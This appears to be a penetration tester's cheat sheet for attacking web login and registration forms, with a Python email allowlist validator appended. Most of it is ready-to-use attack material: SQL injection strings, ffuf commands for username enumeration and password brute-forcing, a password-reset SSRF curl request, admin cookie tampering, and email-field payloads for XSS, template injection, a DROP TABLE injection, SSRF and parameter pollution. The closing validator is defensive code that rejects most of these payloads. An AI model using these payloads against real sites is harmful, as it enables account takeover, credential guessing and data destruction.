👤Login Form

SQLi test on the login form:

admin' --
admin' #
admin' /*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--

User enumeration:

ffuf -w <wordlist-path> -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://<IP>/<loginform-path> -mr "username already exists"

Password fuzzing with the list of valid users:

ffuf -w <valid-usernames.txt>:W1,<wordlist-pass-path>:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://<IP>/<loginform-path> -fc 200

SSRF - Reset pass:

curl 'http://<IP>/reset?email=<name>%40<URL>' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=<name>&email=<your-email>'

Cookie manipulation:

curl -H 'Cookie: logged_in=true; admin=true' http://<IP>/cookie-test

------------------------------------------------------------------------------------

Payloads in the Email field (login/register)

XSS:

test+(<script>alert(hola)</script>)@email.com

test@email(<script>alert(hola)</script>).com

"<script>alert(hola)</script>"@email.com

SSTI/CSTI:

"<%= 7 * 7 %>"@email.com
test+(${{7*7}})@email.com

SQLi:

" ' OR 1=1 -- '"@email.com
"mail'); DROP TABLE users;--"@email.com

SSRF:

false.email@abc123.burpcollaborator.net
false.email@[127.0.0.1]

Parameter pollution:

victim&email=attacker@email.com
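
Added example (not part of the original notes): the email-field entries above rely on address syntax that a form rarely needs, namely parenthesised comments, quoted local parts, [IP] domain literals and extra parameter separators. A strict server-side allowlist for the field, run over constructed sample values; the function names and the allowlist itself are assumptions of this example.

```python
import re

# Conservative allowlist, stricter than RFC 5322 (an assumption of this example):
# no "(comment)" parts, no quoted local parts, no [IP] domain literals.
LOCAL_RE = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9._+-]{0,62}[A-Za-z0-9])?")
LABEL_RE = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?")


def validate_email(value: str) -> tuple[bool, str]:
    """Return (accepted, reason) for the raw value of an email form field."""
    if len(value) > 254:
        return False, "too long"
    if value.count("@") != 1:
        return False, "expected exactly one @"
    local, domain = value.split("@")
    if not LOCAL_RE.fullmatch(local) or ".." in local:
        return False, "local part outside allowlist"
    labels = domain.split(".")
    if len(labels) < 2 or not all(LABEL_RE.fullmatch(lab) for lab in labels):
        return False, "domain is not a plain hostname"
    if not labels[-1].isalpha():
        return False, "top-level label must be alphabetic"
    return True, "ok"


# Constructed sample input: one ordinary address plus values shaped like the
# entries listed above.
SAMPLES = [
    "user.name+tag@example.com",
    "test+(<script>alert(hola)</script>)@email.com",
    "test@email(<script>alert(hola)</script>).com",
    '"<%= 7 * 7 %>"@email.com',
    "\" ' OR 1=1 -- '\"@email.com",
    "false.email@[127.0.0.1]",
    "victim&email=attacker@email.com",
    # Syntactically valid, so it passes: a syntax check says nothing about
    # where the domain points.
    "false.email@abc123.burpcollaborator.net",
]


def screen(values):
    """Map each submitted value to its (accepted, reason) verdict."""
    return {v: validate_email(v) for v in values}


if __name__ == "__main__":
    for value, (ok, reason) in screen(SAMPLES).items():
        print(f"{'ACCEPT' if ok else 'REJECT'}  {reason:34}  {value!r}")
```

Validation of this kind only narrows what reaches the application; output encoding and parameterised queries are still needed wherever the stored value is rendered or queried.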
